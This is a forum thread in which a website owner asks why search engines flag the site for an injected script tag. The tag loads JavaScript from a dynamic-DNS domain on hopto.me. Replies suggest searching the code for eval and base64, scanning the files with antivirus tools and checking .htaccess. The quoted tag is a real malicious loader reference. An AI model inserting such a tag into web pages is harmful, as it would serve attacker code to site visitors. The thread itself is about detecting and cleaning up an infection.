Virus on the site, hopto.me redirect?

U

udi2013-11-13 18:04:01

Malware

udi, 2013-11-13 18:04:01

Suddenly, Google and Yandex search engines recognized my site as dangerous, having found on it a malicious code of the form

&lt;script type="text/javascript" src="//rdomn1384335904.hopto.me/jquery.js?1384336003" /&gt;

. When viewing the content of the pages with different browsers, from different IPs, with different user agents and referrers, no such records were found, incl. in the rendered DOM (there was a suspicion that this code was dynamically injected by some kind of javascript).
At the same time, search engines regularly find this code during rechecks and refuse to exclude the site from the "black list" of infected ones.
Tell me, can anyone come across this? Where to dig, what to do?

Reply

Answer the question

In order to leave comments, you need to log in

3 answer(s)

I

Illusive Echo, 2013-11-13
@udi

To begin with, the site code for the presence of any eval, base64, etc.

D

Dmitry Filatov, 2013-11-13
@i_dozi

The fastest and easiest. It helps me in 9 out of 10 cases. Download all site files to your machine, check with Avast and Cureit. They will show which file is the problem and what the code is.

Also check .htaccess

M

mdx, 2013-11-14
@mdx

Were you able to remove the virus? If yes, please tell me how, Yandex found the same malicious code for me